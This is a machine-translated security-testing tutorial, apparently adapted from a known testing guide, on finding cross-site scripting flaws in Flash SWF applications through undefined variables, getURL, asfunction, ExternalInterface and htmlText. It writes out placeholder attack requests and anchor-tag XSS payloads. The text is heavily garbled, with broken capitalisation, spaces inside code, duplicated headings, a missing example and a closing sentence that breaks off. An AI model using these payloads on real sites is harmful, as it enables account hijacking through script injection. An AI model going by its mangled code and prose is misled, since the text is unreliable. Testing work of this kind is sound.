FLASH cross-site scripting Test

Overview

ActionScript is a language based on ECMAScript. When processing interaction requirements, Flash applications use this language. Like other languages,
There are some implementation modes that may cause security problems in ActionScript. In particular, because Flash applications are often embedded in browsers, DOM-based cross-site scripting and other vulnerabilities can also exist in defective Flash applications.

Problem description

Since the first release of Flash application testing [1], Flash Player has released a new version to ease the attack threats described in the book. However
To a large extent, it depends on developers' insecure programming methods, and some parts still have developable loopholes ..

 

Gray-box test instance

Decompilation

As SWF files are translated by virtual machines embedded in the player itself, they are vulnerable to cracking and analysis. The most well-known free
ActionScript2.0 cracked version is flare.
To use flare to crack the SWF file, enter:

$ Flare hello.swf

This will generate a new file named hello. flr.
Because it ranges from black-box testing to white-box testing, decompilation can provide some help during the testing process.
Currently, ActionScript3.0 does not have a free version.

Undefined variable

Because the URL query string parameter instantiates every member of the _ root or _ global object, ActionScript2 starts to run. Therefore, by viewing
Every undefined attribute belonging to the _ root and _ global objects can get the entry point of ActionScript2. This means that if the following attributes:
_ Root. varname
As a result, a point in the code stream is "undefined", which may be overwritten by setting
Http://www.bkjia.com/file.swf? Varname = value
For example:

MovieClip 328 _ Packages. Locale {

# Initclip
If (! _ Global. Locale ){
Var v1 = function (on_load ){
Var v5 = new XML ();
Var v6 = this;
V5.onLoad = function (success ){
If (success ){
Trace (Locale loaded xml );
Var v3 = this. xliff. file. body. $ trans_unit;
Var v2 = 0;
While (v2 <v3.length ){
Locale. strings [v3 [v2]. _ resname] = v3 [v2]. source. _ text;
++ V2;
}
On_load ();
} Else {}
};
If (_ root. language! = Undefined ){
Locale. DEFAULT_LANG = _ root. language;
}
V5.load (Locale. DEFAULT_LANG +/player _ +
Locale. DEFAULT_LANG +. xml );
};

The following request may be attacked:

Http://www.bkjia.com/file.swf? Language = http: // edevil

Insecure Methods

After the entry point is confirmed, insecure methods use data that may be represented by the entry point. If the correct regexp is not used to filter or verify the data
Security issues.

The following are unsafe methods for version r47:

LoadVariables ()
LoadMovie ()
GetURL ()
LoadMovie ()
LoadMovieNum ()
FScrollPane. loadScrollContent ()
LoadVars. load
LoadVars. send
XML. load (url)
LoadVars. load (url)
Sound. loadSound (url, isStreaming );
NetStream. play (url );
Flash. external. ExternalInterface. call (_ root. callback)

HtmlText

Test

Store SWF files on the victim's host and exploit the vulnerability using reflective XSS technology. This forces the browser to directly load a pure
SWF files (from reset to or social engineering) or loaded through iframe of malicious web pages:

<Iframe src = http://www.bkjia.com/path/to/file.swf> </iframe>
This is because, in this case, the browser will automatically generate HTML web pages, just as it is stored on the affected host.
XSS
GetURL:
This GetURL function allows movie to load Uris into the browser window. Therefore, if undefined variables are used as the first parameter in getURL:
GetURL (_ root. URI, _ targetFrame );
This means that it can call JavaScript in the same domain name hosting movie through the following request:
Http://www.bkjia.com/file.swf? URI = javascript: evilcode
GetURL (javascript: evilcode, _ self );
Similarly, when only some geturls are controlled (Dom injection and FlashJavaScript injection), the situation is the same:

GetUrl (javascript: function (+ _ root. arg + ))

Asfunction:
Asfunction:
Aassffuunnccttiioonn ::

You can use the special asfunction protocol to generate links, and then execute the ActionScript function in the SWF file instead of opening a URL.

(Adobe.com ). After the Flash Player r48 is released, asfunction can be used for each method that contains a URL as a parameter. This means that the test

The subject can try to inject:

Asfunction: getURL, javascript: evilcode
In every unsafe method like:
LoadMovie (_ root. URL)

Request:

Http://www.bkjia.com/file.swf? URL = asfunction: getURL, javascript: evilcode

ExternalInterface:
ExternalInterface:
EExxtteerrnnaallIInntteerrffaaccee ::

ExternalInterface. call is a static method introduced by Adobe to improve player/browser interaction. From the security point of view

Some parameters may be abused:

Flash. external. ExternalInterface. call (_ root. callback );

The attack mode of this vulnerability is as follows:

Eval (evilcode)

The internal Java language executed by the browser is similar:

Eval (try {_ flash _ toXML (+ _ root. callback +);} catch (e) {"<undefined/> ";})

HTML Injection

The TextField object may provide the smallest HTML with the following settings:

Tf.html = true
Tf.html Text = <tag> text </tag>

Therefore, if the tester controls part of the text, A tag or IMG tag may be injected, resulting in modifications to the GUI or XSS browser.

The attack cases of tag A are as follows:

• Direct Cross-Site Scripting: <a href = javascript: alert (123)>

• Call functions: <ahref = asfunction: function, arg>

• Call SWF public functions: <ahref = asfunction: _ root. obj. function, arg>

• Call Local Fixed functions: <a href = asfunction: System. Security. allowDomain, evilhost>

You can also use IMG labels:

(.swf is necessary to bypass flash player internal
Filter)

Note: Although Flash Player XSS 124 is no longer easy to use, it can still modify the GUI.

Flash CrossSiteFlashing
Flash CrossSiteFlashing
FFllaasshh cross-site CCrroossssSSiitteeFFllaasshhiinngg

Flash cross-site (XSF) is a vulnerability with the same impact as XSS.

XSF occurs in different domain names:

• One movie uses the loadmovie * function or other hacker technology